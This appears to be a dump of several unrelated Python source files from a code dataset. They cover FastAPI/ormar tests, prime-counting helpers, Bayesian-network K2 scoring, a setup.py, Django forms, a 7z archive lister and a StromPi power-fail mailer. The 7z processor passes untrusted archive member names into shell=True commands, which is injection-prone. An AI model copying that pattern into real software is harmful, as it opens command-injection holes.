@app.on_event("shutdown")
async def shutdown() -> None:
    """Disconnect the shared database on app shutdown (no-op if disconnected)."""
    database_ = app.state.database
    if database_.is_connected:
        await database_.disconnect()
class Category(ormar.Model):
    """Ormar model for the 'categories' table (id + name)."""
    class Meta:
        tablename = "categories"
        metadata = metadata
        database = database

    id: int = ormar.Integer(primary_key=True)
    name: str = ormar.String(max_length=100)
class Item(ormar.Model):
    """Ormar model for the 'items' table with a many-to-many link to Category."""
    class Meta:
        tablename = "items"
        metadata = metadata
        database = database

    id: int = ormar.Integer(primary_key=True)
    name: str = ormar.String(max_length=100)
    categories: List[Category] = ormar.ManyToMany(Category)
@pytest.fixture(autouse=True, scope="module")
def create_test_database():
    """Create all tables before the module's tests run and drop them after."""
    engine = sqlalchemy.create_engine(DATABASE_URL)
    metadata.create_all(engine)
    yield
    metadata.drop_all(engine)
@app.post("/items/", response_model=Item)
async def create_item(item: Item):
    """Persist an item together with all of its related objects."""
    await item.save_related(follow=True, save_all=True)
    return item
@app.get("/items/{item_id}")
async def get_item(item_id: int):
    """Return an item with its categories, omitting PKs and through models."""
    item = await Item.objects.select_related("categories").get(pk=item_id)
    return item.dict(exclude_primary_keys=True, exclude_through_models=True)
@app.get("/categories/{category_id}")
async def get_category(category_id: int):
    """Return a category with its items, omitting primary keys only."""
    category = await Category.objects.select_related("items").get(pk=category_id)
    return category.dict(exclude_primary_keys=True)
@app.get("/categories/nt/{category_id}")
async def get_category_no_through(category_id: int):
    """Return a category with its items, omitting through models only."""
    category = await Category.objects.select_related("items").get(pk=category_id)
    return category.dict(exclude_through_models=True)
@app.get("/categories/ntp/{category_id}")
async def get_category_no_pk_through(category_id: int):
    """Return a category with its items, omitting both PKs and through models."""
    category = await Category.objects.select_related("items").get(pk=category_id)
    return category.dict(exclude_through_models=True, exclude_primary_keys=True)
@app.get(
    "/items/fex/{item_id}",
    response_model=Item,
    # Exclude ids and relation back-references via response_model_exclude
    # instead of dict() arguments.
    response_model_exclude={
        "id",
        "categories__id",
        "categories__itemcategory",
        "categories__items",
    },
)
async def get_item_excl(item_id: int):
    """Return an item, letting the response model drop ids/through fields."""
    item = await Item.objects.select_all().get(pk=item_id)
    return item
def test_all_endpoints():
    """End-to-end check of every route and each dict()/exclude variant."""
    client = TestClient(app)
    with client as client:
        item = {
            "name": "test",
            "categories": [{"name": "test cat"}, {"name": "test cat2"}],
        }
        # POST assigns primary keys to the item and its categories.
        response = client.post("/items/", json=item)
        item_check = Item(**response.json())
        assert item_check.id is not None
        assert item_check.categories[0].id is not None
        # Both PK/through-free serializations round-trip to the input payload.
        no_pk_item = client.get(f"/items/{item_check.id}", json=item).json()
        assert no_pk_item == item
        no_pk_item2 = client.get(f"/items/fex/{item_check.id}", json=item).json()
        assert no_pk_item2 == item
        # Excluding only PKs still exposes the (pk-less) through model.
        no_pk_category = client.get(
            f"/categories/{item_check.categories[0].id}", json=item
        ).json()
        assert no_pk_category == {
            "items": [
                {
                    "itemcategory": {"category": None, "id": 1, "item": None},
                    "name": "test",
                }
            ],
            "name": "test cat",
        }
        # Excluding only through models keeps the ids.
        no_through_category = client.get(
            f"/categories/nt/{item_check.categories[0].id}", json=item
        ).json()
        assert no_through_category == {
            "id": 1,
            "items": [{"id": 1, "name": "test"}],
            "name": "test cat",
        }
        # Excluding both yields the minimal representation.
        no_through_category = client.get(
            f"/categories/ntp/{item_check.categories[0].id}", json=item
        ).json()
        assert no_through_category == {"items": [{"name": "test"}], "name": "test cat"}
9646345 | <filename>utils/noise.py
import numpy as np
import torch
class RandomActionNoise:
    """Exploration noise: state relaxes toward `mu` at rate `theta` while a
    `sigma`-scaled uniform [0, 1) perturbation is added on every sample()."""

    def __init__(self, action_dim, mu=0, theta=0.1, sigma=1):
        self.action_dim = action_dim
        self.mu = mu
        self.theta = theta
        self.sigma = sigma
        self.x = np.ones(self.action_dim) * self.mu

    def reset(self):
        """Reset the internal state back to the mean."""
        self.x = np.ones(self.action_dim) * self.mu

    def sample(self):
        """Advance the noise process one step and return the new state."""
        drift = self.theta * (self.mu - self.x)
        shock = self.sigma * np.random.rand(len(self.x))
        self.x = self.x + (drift + shock)
        return self.x
1919821 | <reponame>upamanyus/primerunning<filename>src/primefunctions.py
class PrimeFunctions:
    """Prime walking/running helpers backed by a precomputed prime list.

    The backing file contains the maximum covered value followed by the
    primes themselves (whitespace-separated, increasing order).
    """
    def __init__(self, textName):
        """Load the max value and the prime list from the file `textName`."""
        primeFile = open(textName)
        primeStrings = primeFile.read().split()
        primeFile.close()
        self.maxValue = int(primeStrings[0])
        self.primes = [int(num) for num in primeStrings[1:]]
    def walkingStep(self, a, q, p):
        """Returns 1 if p = a mod q, and 0 otherwise. Assumes that p is not
        larger than self.maxValue."""
        if p % q == a:
            return 1
        else:
            return 0
    def runningStep(self, a, q, n):
        """Return 1 if the largest prime <= n is congruent to a (mod q),
        and 0 otherwise (including n < 2).

        NOTE(review): the original docstring stated the opposite of what
        the code returns, and claimed n should exceed self.maxValue --
        presumably it should NOT exceed it; confirm against callers.
        """
        index = 0
        if n < 2:
            return 0
        # Advance to the first prime >= n, stepping back on overshoot; the
        # short-circuit 'or' guards against indexing past the list end.
        while self.primes[index] < n:
            index += 1
            if index >= len(self.primes) or self.primes[index] > n:
                index -= 1
                break
        if self.primes[index] % q == a:
            return 1
        else:
            return 0
    def walkingSumPrimes(self, a, q):
        """Returns the output values of the prime walking function at prime
        coordinates (i.e., the jth entry in the output array corresponds to the
        jth prime number). The first prime is intentionally skipped (entry 0)."""
        sum = 0
        output = [0]
        for p in self.primes[1:]:
            if p % q == a:
                sum += 1
            output.append(sum)
        return output
    def runningSum(self, a, q, n):
        """Returns the prime running function evaluated at n.

        Raises RuntimeError when n exceeds the range covered by the file.
        """
        if n > self.maxValue:
            raise RuntimeError("Number too large")
        sum = 0
        r = self.primes[0]
        for p in self.primes[1:]:
            # Once we pass n, add the final partial segment and stop.
            if p > n:
                sum += (n - r) * self.walkingStep(a, q, r)
                return sum
            sum += self.walkingStep(a, q, r) * (p - r)
            r = p
        return sum + (n - r) * self.walkingStep(a, q, r)
    def runningSumPrimes(self, a, q):
        """Returns the output values of the prime running function at prime
        coordinates (i.e., the jth entry in the output array corresponds to the
        jth prime number)."""
        r = self.primes[0]
        sum = 0
        output = [0]
        for p in self.primes[1:]:
            # Count the gap after r (exclusive) plus p itself when matching.
            if r % q == a:
                sum += (p - r - 1)
            if p % q == a:
                sum += 1
            r = p
            output.append(sum)
        return output
    def runningSumPrimesAll(self, q):
        """Returns an array of arrays, where the jth array contains the
        output values of the prime running function j mod q."""
        outputs = [[0] for a in range(q)] # TODO: Fix the starting coordinate
        sums = [0 for a in range(q)]
        r = self.primes[0]
        for p in self.primes[1:]:
            a = p % q
            sums[a] += 1
            b = r % q
            sums[b] += p - r - 1
            for i in range(q):
                outputs[i].append(sums[i])
            r = p
        return outputs
| StarcoderdataPython |
from __future__ import division

import itertools
import math
from decimal import Decimal

import numpy as np
def MLEstimation(graph, data):
    """Maximum-likelihood CPT estimation for every variable in the network.

    graph is an adjacency matrix (graph[i][k] == 1 means i is a parent of k);
    data is a list of cases (rows over all variables). Returns one CPT per
    variable, as produced by MLEstimationVariable. (Python 2: relies on
    map() returning a list.)
    """
    # Transpose so row i lists the parent indicators of variable i.
    gragh_flip=np.array(map(list,zip(*graph)))
    cptList=[]
    for i in range(len(gragh_flip)):
        variable=i
        parents=[]
        for k in range(len(gragh_flip[i])):
            if gragh_flip[i][k]==1:
                parents.append(k)
        cpt=MLEstimationVariable(variable, parents, data)
        cptList.append(cpt)
    return cptList
def MLEstimationVariable(variable, parents, data):
    """Estimate the CPT of `variable` given its `parents` from `data`.

    Returns a list with one row per parent-value combination (or a single
    row when there are no parents), each row holding one relative frequency
    per possible value of the variable.

    NOTE(review): the 'else' branch divides counts by the TOTAL number of
    cases rather than by Nj (cases matching the parent configuration), so
    the rows are joint rather than conditional probabilities -- confirm
    whether this is intended.
    """
    data_flip=np.array(map(list,zip(*data)))
    cpt=[]
    possible_value=np.unique(data_flip[variable])
    num_occur=[]
    for i in possible_value:
        num_occur.append(np.sum(data_flip[variable]==i))
    if len(parents)==0:
        for k in num_occur:
            cpt.append([k/len(data_flip[variable])])
        return cpt
    else:
        possible_value_pa=[]
        for par in parents:
            #each possible value that the parents could have
            possible_value_pa.append(np.unique(data_flip[par]))
        situation_possible=parents_enumerate(possible_value_pa)
        # for each value parents get
        for situation in range(len(situation_possible)):
            cpt.append([])
            Nj=0
            situ=[0]*len(possible_value)
            # for each case that fit the situation
            for case in data:
                cur_int=0
                flag=True
                # if a case really fit
                while cur_int<len(parents):
                    if case[parents[cur_int]]==situation_possible[situation][cur_int]:
                        pass
                    else:
                        flag= False
                        break
                    cur_int+=1
                if flag== False:
                    continue
                else:
                    #it fit!
                    Nj+=1
                    for i in range(len(possible_value)):
                        if possible_value[i]==case[variable]:
                            situ[i]+=1
            for b in range(len(situ)):
                cpt[situation].append(situ[b]/len(data_flip[variable]))
        return cpt
def log_dd(num):
    """Return the number of decimal digits of `num` minus one (~floor(log10)).

    Used as a cheap approximation of log10 for huge factorial values
    (passed in as Decimal/long) where float conversion would overflow.
    """
    digit = 0
    # BUG FIX: the original condition was `num > 10`, which undercounted
    # exact powers of ten (e.g. log_dd(10) returned 0 instead of 1).
    while num >= 10:
        num /= 10
        digit += 1
    return digit
def K2Score_log(variable, parents, data):
    """Approximate log10 of the K2 score of `variable` given `parents`.

    Uses log_dd (decimal digit count) as a coarse log10 of each factorial
    term of the K2 metric, so the score stays computable for huge counts.
    Mirrors the data layout of the original: `data[variable]` is a column
    when there are no parents; with parents, cases are rows of the
    transposed data.
    """
    score=0
    # BUG FIX: removed leftover `print score` debug statements (Python 2
    # syntax) that spammed stdout and broke Python 3 parsing.
    possible_value=np.unique(data[variable])
    r=len(possible_value)
    if len(parents)==0:
        Nj=len(data[variable])
        num_occur=[]
        for i in possible_value:
            num_occur.append(np.sum(data[variable]==i))
        try:
            score+=log_dd(Decimal(math.factorial(r-1)))
            score-=log_dd(Decimal(math.factorial(Nj+r-1)))
        except ValueError:
            pass
        for b in range(len(num_occur)):
            score+=log_dd(Decimal(math.factorial(num_occur[b])))
        return score
    else:
        possible_value_pa=[]
        for par in parents:
            #each possible value that the parents could have
            possible_value_pa.append(np.unique(data[par]))
        situation_possible=parents_enumerate(possible_value_pa)
        data_flip=np.array(map(list,zip(*data)))
        # for each value parents get
        for situation in situation_possible:
            Nj=0
            situ=[0]*len(possible_value)
            # for each case that fit the situation
            for case in data_flip:
                cur_int=0
                flag=True
                # if a case really fit
                while cur_int<len(parents):
                    if case[parents[cur_int]]==situation[cur_int]:
                        pass
                    else:
                        flag= False
                        break
                    cur_int+=1
                if flag== False:
                    continue
                else:
                    #it fit!
                    Nj+=1
                    for i in range(len(possible_value)):
                        if possible_value[i]==case[variable]:
                            situ[i]+=1
            try:
                score+=log_dd(Decimal(math.factorial(r-1)))
                score-=log_dd(Decimal(math.factorial(Nj+r-1)))
            except ValueError:
                pass
            for b in range(len(situ)):
                score+=log_dd(math.factorial(situ[b]))
        return score
def BICScore(variable, parents, data):
    """BIC score of `variable` given `parents` over `data`.

    Returns 2 * log-likelihood when there are no parents; with parents,
    subtracts the complexity penalty
    len(possible_value_pa)*(r-1)*log(#cases). Relies on true division
    (from __future__ import division at the top of the file).
    """
    score=0
    possible_value=np.unique(data[variable])
    r=len(possible_value)
    if len(parents)==0:
        Nj=len(data[variable])
        num_occur=[]
        for i in possible_value:
            num_occur.append(np.sum(data[variable]==i))
        for b in num_occur:
            score+=b*math.log(b/Nj)
        return 2*score
    else:
        possible_value_pa=[]
        for par in parents:
            #each possible value that the parents could have
            possible_value_pa.append(np.unique(data[par]))
        situation_possible=parents_enumerate(possible_value_pa)
        data_flip=np.array(map(list,zip(*data)))
        # for each value parents get
        for situation in situation_possible:
            Nj=0
            situ=[0]*len(possible_value)
            # for each case that fit the situation
            for case in data_flip:
                cur_int=0
                flag=True
                # if a case really fit
                while cur_int<len(parents):
                    if case[parents[cur_int]]==situation[cur_int]:
                        pass
                    else:
                        flag= False
                        break
                    cur_int+=1
                if flag== False:
                    continue
                else:
                    #it fit!
                    Nj+=1
                    for i in range(len(possible_value)):
                        if possible_value[i]==case[variable]:
                            situ[i]+=1
            # Zero counts / empty configurations contribute nothing.
            for b in range(len(situ)):
                try:
                    score+=situ[b]*math.log(situ[b]/Nj)
                except (ValueError,ZeroDivisionError):
                    pass
        return 2*score-len(possible_value_pa)*(r-1)*math.log(data.shape[1])
def parents_enumerate(parent_list):
    """Enumerate every combination of parent values.

    Given a list of per-parent value lists, returns their Cartesian product
    as a list of lists, with the first parent varying slowest -- the exact
    order the original hand-rolled index arithmetic produced.
    """
    # itertools.product yields the same combinations in the same order as
    # the original nested bookkeeping, with far less code.
    return [list(combo) for combo in itertools.product(*parent_list)]
def K2Algorithm(K, data, scoreFunction):
    """Greedy K2 structure search: learn a Bayesian-network graph from data.

    For each variable (in the given ordering) greedily adds up to K parents
    from the preceding variables while the score improves. Returns
    [adjacency_matrix, total_score]. This is Python 2 code (print
    statements; `range(n)` is mutated as a list).
    """
    data=np.array(map(list,zip(*data)))
    gragh=[]
    n=data.shape[0]
    parents= [-1]*n
    total_score=0
    for i in range(n):
        print "-----------------------------------"
        print "Current node "+ str(i)
        # The first node in the ordering can have no parents.
        if i==0:
            gragh.append([0]*n)
            total_score+=scoreFunction(i,[],data)
            print "No parent for the first node"
            print ""
            print ""
            continue
        parents[i]=[]
        gragh_list=[0]*n
        score=scoreFunction(i,parents[i],data)
        print "Old score = "+ str(score)
        print "-----------------------------------"
        countinue=True
        digit=0
        #to testify the parents of each node
        while countinue and len(parents[i])<K:
            # Candidate parents: predecessors of i not yet chosen.
            data_list=[range(n)]
            for k in range(i,n):
                data_list[0].remove(k)
            for c in parents[i]:
                data_list[0].remove(c)
            if len(data_list[0])==0:
                print "reach the end of this node"
                break
            #the testify the n-th parents of each node
            max_score=float('-inf')
            max_parents=None
            #find the max score for each other node
            parents[i].append([-1])
            for b in data_list[0]:
                print "considering adding node" +str((i,b))
                parents[i][digit]=b
                score_temp=scoreFunction(i,parents[i],data)
                if score_temp>max_score:
                    max_score=score_temp
                    max_parents=b
                    print "temporary adding node"+str((i,b))
                    print "Temp score = "+ str(score_temp)
                    print "Current max score = "+ str(max_score)
                    print " "
                else:
                    print "No adding node"+str((i,b))
                    print "Temp score = "+ str(score_temp)
                    print "Current max score = "+ str(max_score)
                    print " "
            sNew=max_score
            # Keep the best candidate only when it improves the score.
            if sNew>score:
                print "New score = "+ str(sNew)
                print "Old score = "+ str(score)
                print "adding node"+str((i,max_parents))
                print "-----"
                print "next node to go "
                print "-----"
                score=sNew
                parents[i][digit]=max_parents
                digit+=1
            else:
                parents[i][digit]=None
                print "New score = "+ str(sNew)
                print "Old score = "+ str(score)
                print "Not adding node"+str((i,max_parents))
                print "No result for parent " + str(digit+1)
                print ""
                countinue=False
        # Drop the rejected placeholder slot, if any.
        try:
            parents[i].remove(None)
        except ValueError:
            pass
        for par in parents[i]:
            gragh_list[par]=1
        gragh.append(gragh_list)
        total_score+=score
        print ""
        print "Total score = " +str(total_score)
        print ""
        print ""
    gragh=np.array(map(list,zip(*gragh)))
    print "Final gragh "
    print str(gragh)
    print "Final Score"
    print total_score
    return [gragh, total_score]
def K2Score(variable, parents, data):
    """Return the K2 scoring metric for node `variable` given a list of `parents`.

    Implements the Cooper & Herskovits K2 score:
        prod over parent configurations j of
            (r-1)! / (Nj + r - 1)! * prod_k Njk!
    where r is the number of distinct values `variable` takes, Nj the number
    of data cases matching parent configuration j, and Njk the count of cases
    where `variable` takes its k-th value under that configuration.

    :param variable: row index of the node being scored in `data`
    :param parents:  list of row indices of the candidate parent nodes
    :param data:     2-D array-like, rows = variables, columns = cases
    :return: Decimal score (exact factorial arithmetic to avoid overflow)

    NOTE(review): relies on the external helper `parents_enumerate` (defined
    elsewhere in this file) to enumerate parent value combinations — confirm.
    NOTE(review): `np.array(map(...))` implies Python 2 (map returns a list);
    under Python 3 this would build a 0-d object array.
    """
    score=1
    # Distinct values the scored variable can take (r in the K2 formula).
    possible_value=np.unique(data[variable])
    r=len(possible_value)
    if len(parents)==0:
        # No parents: a single "configuration" covering every case.
        Nj=len(data[variable])
        num_occur=[]
        for i in possible_value:
            num_occur.append(np.sum(data[variable]==i))
        # (r-1)! / (Nj + r - 1)!  -- Decimal keeps the huge factorials exact.
        score*=Decimal(math.factorial(r-1))/Decimal(math.factorial(Nj+r-1))
        for b in range(len(num_occur)):
            score*=Decimal(math.factorial(num_occur[b]))
        return score
    else:
        possible_value_pa=[]
        for par in parents:
            #each possible value that the parents could have
            possible_value_pa.append(np.unique(data[par]))
        # All combinations of parent values (the j index of the K2 formula).
        situation_possible=parents_enumerate(possible_value_pa)
        # Transpose so each row of data_flip is one data case (column of data).
        data_flip=np.array(map(list,zip(*data)))
        # for each value parents get
        for situation in situation_possible:
            Nj=0
            situ=[0]*len(possible_value)
            # for each case that fit the situation
            for case in data_flip:
                cur_int=0
                flag=True
                # if a case really fit
                while cur_int<len(parents):
                    if case[parents[cur_int]]==situation[cur_int]:
                        pass
                    else:
                        flag= False
                        break
                    cur_int+=1
                if flag== False:
                    continue
                else:
                    #it fit!
                    Nj+=1
                    # Tally which value the scored variable takes in this case.
                    for i in range(len(possible_value)):
                        if possible_value[i]==case[variable]:
                            situ[i]+=1
            score*=Decimal(math.factorial(r-1))/Decimal(math.factorial(Nj+r-1))
            for b in range(len(situ)):
                if situ[b]==0:
                    continue
                score*=Decimal(math.factorial(situ[b]))
        return score
| StarcoderdataPython |
92565 | <gh_stars>1-10
#! /usr/bin/env python
# setup.py for the seqmagick package (Python 2.7 era, distutils/setuptools).
# Use setuptools, falling back on provide
try:
    from setuptools import setup, find_packages
except ImportError:
    # Bootstrap setuptools via the (legacy) distribute shim if absent.
    import distribute_setup
    distribute_setup.use_setuptools()
    from setuptools import setup, find_packages
import sys
from seqmagick import __version__ as version
# Hard minimum: seqmagick uses 2.7-only features (argparse, dict comprehensions).
if sys.version_info < (2, 7):
    print 'ERROR: seqmagick requires at least Python 2.7 to run.'
    sys.exit(1)
requires = ['biopython>=1.58']
setup(name='seqmagick',
      version=version,
      description='Tools for converting and modifying sequence files '
                  'from the command-line',
      url='http://github.com/fhcrc/seqmagick',
      download_url='http://pypi.python.org/pypi/seqmagick',
      author='<NAME>',
      author_email='http://matsen.fhcrc.org/',
      packages=find_packages(),
      # Installs the `seqmagick` console command pointing at the CLI main().
      entry_points={
          'console_scripts': [
              'seqmagick = seqmagick.scripts.cli:main'
          ]},
      package_data={'seqmagick.test.integration': ['data/*']},
      setup_requires=['nose>=1.0'],
      test_suite='nose.collector',
      install_requires=requires,
      classifiers=[
          'License :: OSI Approved :: GNU General Public License (GPL)',
          'Development Status :: 3 - Alpha',
          'Programming Language :: Python :: 2.7',
          'Topic :: Scientific/Engineering :: Bio-Informatics',
      ],
      license="GPL V3",
      )
| StarcoderdataPython |
3337850 | from django import forms
from users.models import User
class UserForm(forms.ModelForm):
    """ModelForm for creating/editing a `users.User`.

    Every field overrides the default widget purely to attach the
    Bootstrap "form-control" CSS class; validation comes from the model.
    """
    name = forms.CharField(widget=forms.TextInput(attrs={'class':'form-control'}))
    lastname = forms.CharField(widget=forms.TextInput(attrs={'class':'form-control'}))
    email = forms.CharField(widget=forms.EmailInput(attrs={'class':'form-control'}))
    username = forms.CharField(widget=forms.TextInput(attrs={'class':'form-control'}))
    # NOTE(review): plain CharField -- the view is responsible for hashing the
    # password before saving; confirm it is not stored in clear text.
    password = forms.CharField(widget=forms.PasswordInput(attrs={'class':'form-control'}))
    class Meta:
        model = User
        # (Spanish note below: fields = '__all__' would include every model field.)
        """ fields = __all__ => equivale a todos los campos """
        fields = [
            'name',
            'lastname',
            'email',
            'username',
            'password',
        ]
        labels = {
            'name': 'Name',
            'lastname': 'Lastname',
            'email': 'Email',
            'username': 'Username',
            'password': 'Password',
        }
| StarcoderdataPython |
1709393 | <gh_stars>0
from django import forms
from .models import *
from pyuploadcare.dj.forms import ImageField
from django.contrib.auth.models import User
class EditProfileForm(forms.ModelForm):
    """
    ModelForm for editing an existing User_profile
    (bio, profile picture, email and phone number only).
    """
    class Meta:
        model=User_profile
        fields = ('bio','profile_pic','email','phone_number')
class UpdateProfileForm(forms.ModelForm):
    '''
    ModelForm for adding a user profile.
    NOTE(review): identical to EditProfileForm (same model and fields);
    the two could be collapsed into one form -- confirm both are needed.
    '''
    class Meta:
        model = User_profile
        fields = ('bio','profile_pic','email','phone_number')
class NewProjectForm(forms.ModelForm):
    '''
    ModelForm that lets a user post a new project
    (title, image, description and external project link).
    '''
    class Meta:
        model = Projects
        fields = ('title','image','description','project_link')
class ReviewForm(forms.ModelForm):
    """
    ModelForm for posting a review of a project.
    `project` and `posted_by` are excluded because the view fills
    them in from the request context.
    """
    class Meta:
        model=Review
        exclude = ['project','posted_by']
class RateForm(forms.ModelForm):
    '''
    ModelForm for rating a project.
    `post_rated`, `user` and `date` are excluded because the view
    supplies them (date presumably auto-set by the model -- confirm).
    '''
    class Meta:
        model=Rate
        exclude = ['post_rated','user','date']
| StarcoderdataPython |
3202760 | from serene_load.helpers.containers.container_base import TempFileContainer, BaseContainer, BaseProcessor
import logging
import datetime
import io
import re
import subprocess
log = logging.getLogger()
class SevenZipFileContainer(TempFileContainer):
    """Container for a single member of a 7z archive, extracted on demand via 7za."""
    def decompress(self, source, target):
        # Extract self.filename() from the archive `source` to stdout (-so)
        # and redirect it into `target`; stderr is discarded.
        # NOTE(review): filename/paths are interpolated into a shell command --
        # archive member names containing quotes would break/inject; confirm inputs are trusted.
        subprocess.check_call("/usr/bin/7za e '{}' '{}' -so > {}".format(source, self.filename(), target), stderr=io.open('/dev/null', 'w'), shell=True)
# Register the 7z container with the dispatch registry.
BaseContainer.add_container_type(SevenZipFileContainer)
# Matches a `7za l` listing line that includes a modification timestamp:
# "YYYY-MM-DD HH:MM:SS <attrs> <size> ... <name>".
with_dt = re.compile(
    r'(?P<year>[\d]{4})-(?P<month>[\d]{2})-(?P<day>[\d]{2}) (?P<hour>[\d]{2}):(?P<minute>[\d]{2}):(?P<second>[\d]{2}) [^\s]{5}[\s\t]+(?P<size>[\d]+)[\s\t\d]+[\s]+(?P<name>.*)$',
)
# Matches a listing line with no timestamp (attrs, size, name only).
no_dt = re.compile(
    r'^[\s]+[^\s]{5}[\s\t]+(?P<size>[\d]+)[\s\t\d]+[\s]+(?P<name>.*)$',
)
class SevenZipFileProcessor(BaseProcessor):
    """Processor that detects 7z archives and yields one work item per member."""
    @classmethod
    def valid(cls, args, input_file):
        """Return True if 7za can list `input_file` (i.e. it is a readable 7z archive)."""
        with input_file as infile:
            fp = infile.instantiate_file()
            try:
                # NOTE(review): ">&" is bash/csh redirection; shell=True runs
                # /bin/sh, where this may not behave as intended -- confirm.
                subprocess.check_call(u'7za l "{}" >& /dev/null'.format(fp), shell=True)
                return True
            except subprocess.CalledProcessError:
                return False
    @classmethod
    def unpack(cls, args, input_file):
        """Yield a dict per archive member: accessor, file name, path and (if listed) mtime.

        Parses the text output of `7za l`; the member table is delimited by
        lines of dashes, toggling `file_listing` on entry and off on exit.
        NOTE(review): `check_output` returns bytes on Python 3, so
        `output.split('\\n')` implies this targets Python 2 -- confirm.
        """
        with input_file as infile:
            fp = infile.instantiate_file()
            log.debug(u'using {} for {}'.format(fp, input_file))
            output = subprocess.check_output(u"7za l '{}'".format(fp), shell=True)
            file_listing = False
            for line in output.split('\n'):
                if file_listing:
                    if line.startswith('----'):
                        # Closing dash line: end of the member table.
                        file_listing = False
                        continue
                    # Column 4 is '-' inside a "YYYY-MM-DD ..." date, so this
                    # distinguishes timestamped rows from timestamp-less ones.
                    # NOTE(review): IndexErrors on lines shorter than 5 chars -- confirm
                    # 7za never emits such lines inside the table.
                    if line[4] == '-':
                        match = with_dt.match(line)
                        # Keep only "YYYY-MM-DDTHH:MM:SS" (19 chars) of the ISO string.
                        mtime = datetime.datetime(
                            year=int(match.group('year')),
                            month=int(match.group('month')),
                            day=int(match.group('day')),
                            hour=int(match.group('hour')),
                            minute=int(match.group('minute')),
                            second=int(match.group('second')),
                        ).isoformat()[:19]
                    else:
                        mtime = None
                        match = no_dt.match(line)
                    if match is None:
                        # A table row neither regex understands is a hard error.
                        raise Exception(line)
                    filename = match.group('name').strip()
                    assert not filename == 'file'
                    sz = SevenZipFileContainer(input_fd=input_file, file=filename, job_args=args)
                    d = {
                        'next_func': 'hash',
                        'accessor': sz,
                        'file': filename,
                        'path': input_file.relative_path()
                    }
                    if mtime:
                        d.update({
                            'mtime': mtime
                        })
                    yield d
                else:
                    if line.startswith('----'):
                        # Opening dash line: member table starts on the next line.
                        file_listing = True
4934819 | <reponame>khaledboka/point_to_line<gh_stars>0
from django.apps import AppConfig
from . import APP_NAME
class PointToLineConfig(AppConfig):
    """Django AppConfig for the point_to_line app (name taken from APP_NAME)."""
    name = APP_NAME
    verbose_name = "Point To Line"
| StarcoderdataPython |
1947115 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import RPi.GPIO as GPIO
import time
from time import sleep
import datetime
import serial
import os
import smtplib
from email.mime.text import MIMEText
GPIO.setmode(GPIO.BCM)
#Here you can choose whether you want to receive an email when the Raspberry Pi restarts - 1 to activate - 0 to deactivate
Restart_Mail = 1
# This is The config for the EMAIL notification
#----------------------------------------------
SERVER = 'SMTP.Beispiel.DE'
PORT = 587
EMAIL = '<EMAIL>'
PASSWORT = '<PASSWORD>'
EMPFAENGER = ['<EMAIL>' , '<EMAIL>']
SUBJECT_Powerfail = 'Raspberry Pi Powerfail!'
SUBJECT_Powerback = 'Raspberry Pi Powerback!'
SUBJECT_Restart = 'Raspberry Pi Restart!'
#----------------------------------------------
# Open the StromPi's UART on the Pi's primary serial port (8N1, 38400 baud).
serial_port = serial.Serial(
    port='/dev/serial0',
    baudrate = 38400,
    parity=serial.PARITY_NONE,
    stopbits=serial.STOPBITS_ONE,
    bytesize=serial.EIGHTBITS,
    timeout=3
)
# Re-open to get a clean session, then wake the StromPi console
# ('Q' + carriage return enters/refreshes its command mode).
if serial_port.isOpen(): serial_port.close()
serial_port.open()
serial_port.write(str.encode('Q'))
sleep(1)
serial_port.write(str.encode('\x0D'))
sleep(1)
# Query the StromPi RTC date; reply is a decimal YYMMDD integer.
serial_port.write(str.encode('date-rpi'))
sleep(0.1)
serial_port.write(str.encode('\x0D'))
data = serial_port.read(9999);
date = int(data)
strompi_year = date // 10000
strompi_month = date % 10000 // 100
strompi_day = date % 100
sleep(0.1)
# Query the StromPi RTC time; reply is a decimal HHMMSS integer.
serial_port.write(str.encode('time-rpi'))
sleep(0.1)
serial_port.write(str.encode('\x0D'))
data = serial_port.read(9999);
timevalue = int(data)
strompi_hour = timevalue // 10000
strompi_min = timevalue % 10000 // 100
strompi_sec = timevalue % 100
rpi_time = datetime.datetime.now().replace(microsecond=0)
strompi_time = datetime.datetime(2000 + strompi_year, strompi_month, strompi_day, strompi_hour, strompi_min, strompi_sec, 0)
# NOTE(review): `command` is assigned but never used below -- confirm it is dead code.
command = 'set-time %02d %02d %02d' % (int(rpi_time.strftime('%H')),int(rpi_time.strftime('%M')),int(rpi_time.strftime('%S')))
# Sync whichever clock is behind: Pi newer -> push to StromPi, else pull from StromPi.
if rpi_time > strompi_time:
    # bytes %-formatting (the encoded format string is filled afterwards).
    serial_port.write(str.encode('set-date %02d %02d %02d %02d') % (int(rpi_time.strftime('%d')),int(rpi_time.strftime('%m')),int(rpi_time.strftime('%Y'))%100,int(rpi_time.isoweekday())))
    sleep(0.5)
    serial_port.write(str.encode('\x0D'))
    sleep(1)
    serial_port.write(str.encode('set-clock %02d %02d %02d') % (int(rpi_time.strftime('%H')),int(rpi_time.strftime('%M')),int(rpi_time.strftime('%S'))))
    sleep(0.5)
    serial_port.write(str.encode('\x0D'))
    print ("-----------------------------------------")
    print ("The date und time has been synced: Raspberry Pi -> StromPi")
    print ("-----------------------------------------")
else:
    # Set the Pi's system clock from the StromPi RTC (requires sudo).
    os.system('sudo date +%%y%%m%%d --set=%02d%02d%02d' % (strompi_year, strompi_month, strompi_day))
    os.system('sudo date +%%T -s "%02d:%02d:%02d"' % (strompi_hour, strompi_min, strompi_sec))
    print ("-----------------------------------------")
    print ("The date und time has been synced: StromPi -> Raspberry Pi")
    print ("-----------------------------------------")
# Leave the console ('quit'), then enable serialless mode (set-config 0 2)
# so the StromPi signals events without holding the serial console.
if serial_port.isOpen(): serial_port.close()
serial_port.open()
serial_port.write(str.encode('quit'))
time.sleep(0.1)
serial_port.write(str.encode('\x0D'))
time.sleep(0.2)
serial_port.write(str.encode('set-config 0 2'))
time.sleep(0.1)
serial_port.write(str.encode('\x0D'))
time.sleep(0.2)
print ("Enabled Serialless")
print ("E-Mail notification in case of Powerfailure (CTRL-C for exit)")
# Set pin as input
def Sendmail_Restart():
    """Send the 'Raspberry Pi restarted' notification mail, then start watching
    the serial port for power failures.

    NOTE(review): this function never returns (it tail-calls Detect_Powerfail,
    which loops forever and in turn calls back into the Sendmail_* functions) --
    every event deepens the Python call stack; consider a flat event loop.
    """
    # German HTML body: "Your Raspberry Pi was restarted."
    BODY = """
    <html>
    <head></head>
    <body>
    <style type="text/css">
    .tg {border-collapse:collapse;border-spacing:0;}
    .tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
    .tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
